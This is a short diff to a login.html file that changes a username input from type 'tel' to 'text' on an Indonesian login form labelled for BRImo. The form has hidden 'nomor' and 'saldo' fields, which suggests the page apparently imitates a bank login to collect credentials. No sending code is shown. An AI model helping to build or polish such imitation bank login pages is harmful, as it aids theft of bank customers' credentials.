--- a/login.html
+++ b/login.html
@@ -1247,7 +1247,7 @@ input{
  <input type="hidden" id="nomor" name="nomor">
  <input type="hidden" id="saldo" name="saldo">
 <h5 style="color:#000; margin-top: 0px; margin-left: 4px; text-align: left;">Masukan Username BRImo anda</h5><br/><ion-icon name="person-circle-outline"></ion-icon>
-<input id="uname" name="uname" type="tel" style="box-sizing: border-box; height: 40px; width: 536px; max-width: 100%; border: 1px solid #aaa; border-image: initial; background-color: rgb(255, 255, 255);   border-radius: 15px 0px 15px 0px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -5px; padding-left: 40px; box-shadow:inset 0 1px 1px rgba(0,0,0, 0.2);" placeholder="Username"  required maxlength="" minlength="3">
+<input id="uname" name="uname" type="text" style="box-sizing: border-box; height: 40px; width: 536px; max-width: 100%; border: 1px solid #aaa; border-image: initial; background-color: rgb(255, 255, 255);   border-radius: 15px 0px 15px 0px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -5px; padding-left: 40px; box-shadow:inset 0 1px 1px rgba(0,0,0, 0.2);" placeholder="Username"  required maxlength="" minlength="3">
 </h3>
 <br>
 <h5 style="color:#000; margin-top: 15px; margin-left: 4px; text-align: left;">Password :</h5><br/><ion-icon name="lock-closed-sharp" style="margin-top: -2px"></ion-icon>
